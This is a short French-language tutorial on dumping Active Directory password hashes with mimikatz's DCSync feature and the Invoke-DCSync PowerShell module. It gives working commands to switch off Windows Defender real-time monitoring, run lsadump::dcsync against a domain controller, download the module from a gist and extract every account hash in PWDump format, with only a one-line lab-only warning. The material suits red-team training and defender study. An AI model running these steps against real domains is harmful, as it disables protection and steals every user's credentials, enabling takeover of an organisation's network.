
Invoke-DCSync
Invoke-DCSync Référence : https://adsecurity.org/?p=1729 Référence : https://silentbreaksecurity.com/invoke-dcsync-because-we-all-wanted-it/ Objectif : récupérer les hashs de mots de passe de tous les comptes utilisateurs sur un contrôleur de domaine à l'aide de la fonction DCSync de mimikatz
Avertissement : à faire uniquement dans un environnement de laboratoire.
mimikatz a implémenté un outil appelé DCSync, qui permet à mimikatz d'usurper l'identité d'un contrôleur de domaine et de tenter de récupérer tous les hashs de mots de passe depuis un autre contrôleur de domaine.
Vous devrez peut-être désactiver Windows Defender
Ouvrez PowerShell en tant qu'administrateur et tapez
$ Set-MpPreference -DisableRealtimeMonitoring $true
Démarrez mimikatz
$ lsadump::dcsync /domain:test.local /user:Administrator
Vous avez maintenant le hash du mot de passe de cet utilisateur
Cela nécessite que vous disposiez d'un accès Administrateur, plus précisément de l'attribut Common Name Get-Replication-Changes-All
Vous pouvez utiliser le module Invoke-DCSync pour extraire tous les hashs.
Téléchargez depuis : https://gist.github.com/monoxgas/9d238accd969550136db
$ Import-Module ./Invoke-DCSync.ps1
$ Invoke-DCSync -PWDumpFormat